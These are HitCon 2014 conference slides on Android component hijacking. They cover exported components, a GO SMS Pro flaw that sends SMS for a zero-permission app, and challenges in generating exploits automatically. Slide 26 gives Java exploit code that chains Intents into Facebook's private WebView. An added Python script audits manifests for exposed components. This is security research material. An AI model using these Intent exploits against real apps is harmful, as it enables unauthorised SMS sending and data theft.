These are my slides for HitCon'14: http://hitcon.org/2014/agenda/
Demo exploits and vulnerable apks are available at https://github.com/daoyuan14/ComponentHijackingExploit
6. Component: The Building Block of Android Apps
• An app can have four types of components: Activity, Service, Broadcast Receiver, Content Provider.
• They have their own entry points and can be activated individually.
7. Components can be Exposed to Other Apps
• For flexible code and data sharing.
• Android (mainly) uses the Manifest XML file to define component exposure.
(Diagram: the Twitter app contains a Tweet UI and an Upload Service; the Tweet UI sends an IMAGE_CAPTURE request to the Camera app's Camera component, which is exported, and gets a photo back.)
8. Components can be Exposed to Other Apps
• The Manifest XML file of Chrome: (screenshot)
9. However, the confused deputy problem will occur, causing component hijacking, because any other app can send requests to exported components.
11. Example: The Vulnerable GO SMS Pro
First reported by us on Sep 9, 2013.
Let’s see how to exploit it!
12. GO SMS Pro and Its Exported Component
• Very popular
  – The top 1 SMS app in Google Play
  – Over 75 million installs
• But its CellValidateService is exported
  – In our tested versions: 4.35 and 5.23
15. Demo
• An attack app (with zero permissions) can exploit GO SMS Pro to send SMS messages (to an arbitrary phone number specified by the attacker).
Video link: http://youtu.be/CwtNCwAHSRs?t=25s
17. Exported Components are Common in Android Apps
• Statistics of top 1K apps
(Chart: why components end up exported)
  – Launcher or Sharing Activities
  – System broadcasts require exported components
  – Developers’ mistakes (intent-filter or provider)
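As an added example (not the talk's own code or tooling), a small Python audit that applies the manifest export rules behind the "developers' mistakes" category above (an intent-filter implies exported; a provider defaults to exported on API 16 and below) to a constructed manifest, and lists the components any app can reach without holding a permission. The package and component names are assumptions.

```python
import xml.etree.ElementTree as ET
A = "{http://schemas.android.com/apk/res/android}"  # Android manifest namespace
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed sample manifest for a hypothetical app (not GO SMS Pro or Chrome): launcher
# activity, private activity, service exported by attribute, protected receiver, bare provider.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.victim">
  <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="19"/>
  <application>
    <activity android:name=".LauncherActivity">
      <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
    </activity>
    <activity android:name=".SettingsActivity"/>
    <service android:name=".ValidateService" android:exported="true"/>
    <receiver android:name=".SmsReceiver" android:exported="true"
              android:permission="com.example.victim.SMS"/>
    <provider android:name=".MessageProvider" android:authorities="com.example.victim.msg"/>
  </application>
</manifest>"""

def effective_export(comp, min_sdk, target_sdk):
    """Manifest defaults: an explicit attribute wins, an intent-filter implies
    exported, and providers default to exported when either SDK level is <= 16."""
    explicit = comp.get(A + "exported")
    if explicit is not None:
        return explicit == "true", 'android:exported="%s"' % explicit
    if comp.find("intent-filter") is not None:
        return True, "intent-filter present, android:exported unset"
    if comp.tag == "provider" and min(min_sdk, target_sdk) <= 16:
        return True, "provider on API <= 16 defaults to exported"
    return False, "not exported"

def audit_manifest(xml_text):
    """One finding per component; 'unprotected' = any app can reach it, no permission guards it."""
    root = ET.fromstring(xml_text)
    sdk = root.find("uses-sdk")  # Android treats a missing <uses-sdk> as API 1
    min_sdk = int(sdk.get(A + "minSdkVersion", "1")) if sdk is not None else 1
    target_sdk = int(sdk.get(A + "targetSdkVersion", str(min_sdk))) if sdk is not None else 1
    findings = []
    for comp in root.iter():
        if comp.tag in COMPONENT_TAGS:
            exported, reason = effective_export(comp, min_sdk, target_sdk)
            perm = comp.get(A + "permission")
            findings.append({"type": comp.tag, "name": comp.get(A + "name"), "exported": exported,
                             "reason": reason, "permission": perm,
                             "unprotected": exported and perm is None})
    return findings

def unprotected_components(xml_text):
    return [f["name"] for f in audit_manifest(xml_text) if f["unprotected"]]
```

Running the audit on the sample reports the launcher activity (expected), the explicitly exported service, and the provider that is exported only because minSdkVersion is 14; the permission-protected receiver is exported but not flagged.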
19. Prior Related Work
Targeted generation:
• “Android Permission Re-Delegation Detection and Test Case Generation”
• “Detecting Passive Content Leaks and Pollution in Android Applications”
• “Automatically Exploiting Potential Component Leaks in Android Applications”
Random generation:
• “An Empirical Study of the Robustness of Inter-component Communication in Android”
• Intent Fuzzer (by iSec)
• Drozer (formerly Mercury)
• “IntentFuzzer: Detecting Capability Leaks of Android Applications”
20. Even an Unpublished BlackHat’14 One
• “Static Detection and Automatic Exploitation of Intent Message Vulnerabilities in Android Applications”
  – https://www.blackhat.com/us-14/briefings.html#static-detection-and-automatic-exploitation-of-intent-message-vulnerabilities-in-android-applications
21. However, they are far from perfect. We argue that several challenges need to be addressed for a robust exploit generation technique.
22. Overview of Challenges in Focus
• Cross-component invocation problem
  – Or the Next Intent issue
• Custom structure containment problem
  – Exploits may need to contain custom structures
• Semantic constraint resolving problem
  – Beyond the typical numeric or string constraints
• Pending Intent issue
  – Crafting exploit Intents is a bit different
(Callout on the slide: “First pinpointed”)
23. Illustrated with Real Vulnerable Apps
• Cross-component invocation problem
  – Or the Next Intent issue
  – Facebook
• Custom structure containment problem
  – Exploits may need to contain custom structures
  – Clean Master
• Semantic constraint resolving problem
  – Beyond the typical numeric or string constraints
  – Lango Messaging
• Pending Intent issue
  – Crafting exploit Intents is a bit different
  – Lango Messaging
(Callout on the slide: “First pinpointed”)
26. Exploit Facebook by Takeshi Terada
• LoginActivity -> FacebookWebViewActivity

// FB_PKG, FB_LOGIN_ACTIVITY and FB_WEBVIEW_ACTIVITY are string constants
// (package and class names) defined elsewhere in the exploit.
// create continuation_intent to call FacebookWebViewActivity.
Intent contIntent = new Intent();
contIntent.setClassName(FB_PKG, FB_WEBVIEW_ACTIVITY);
contIntent.putExtra("url", "file:///sdcard/attack.html");
// create intent to be sent to LoginActivity.
Intent intent = new Intent();
intent.setClassName(FB_PKG, FB_LOGIN_ACTIVITY);
intent.putExtra("login_redirect", false);
// put continuation_intent into extra data of the intent;
// the exported LoginActivity forwards it to the private FacebookWebViewActivity.
intent.putExtra(FB_PKG + ".continuation_intent", contIntent);
this.startActivity(intent);
27. How to Automatically Handle the Cross-component Invocation?
• What final inputs do exported components give to you?
  – Maybe only an action, or better an extra field.
  – Best: control the whole Intent.
• Which private components to select or attack?
  – Find the set of valuable target components.
  – Match the capabilities we have.
31. But UninstallAppData is Defined by the Victim App
Option 1:
• Decompile the victim app and obtain the source code of the UninstallAppData structure.
• But this is not reliable
  – Decompilation is imperfect
Option 2:
• Mimic the skeleton of the target structure
• “Part of the source code”
  – Field definitions
  – Interface functions
• But complicated, and it may still fail.
40. Even Under Brute-force Attempts
• Suppose the target URI is: content://sms/121
  – The last field (121) can be brute forced, but setting up valid data still requires pre-knowledge.
• Pre-knowledge is required!
  (1) Use the model to pinpoint “sms”
  (2) Cover the common URIs, e.g. “contact”
  But there is no guarantee.
42. What is getResultCode() for?
Retrieve the current result code, as set by the previous receiver.
43. See how SMS is sent

// The app first creates two PendingIntents wrapping implicit broadcast Intents.
PendingIntent sentPI = PendingIntent.getBroadcast(context, 0, new Intent(SENT), 0);
PendingIntent deliveredPI = PendingIntent.getBroadcast(context, 0, new Intent(DELIVERED), 0);
// Then it hands them to the SMS manager; the system fires them when the message is sent/delivered.
sms.sendTextMessage(phoneNumber, null, message, sentPI, deliveredPI);

The Intents in sentPI and deliveredPI are broadcast after the invocation of sendTextMessage(), and they carry the corresponding result codes.
44. The Rest of the Exploit for Lango
• Invoke PendingIntent.send() to trigger its broadcast, as well as setting result codes.
45. Conclusion
• My opinion:

Challenge             Automatic?   Note
Cross-component                    But not easy
Custom structure                   May fail
Semantic constraint                Pre-knowledge
Pending intent                     Need to handle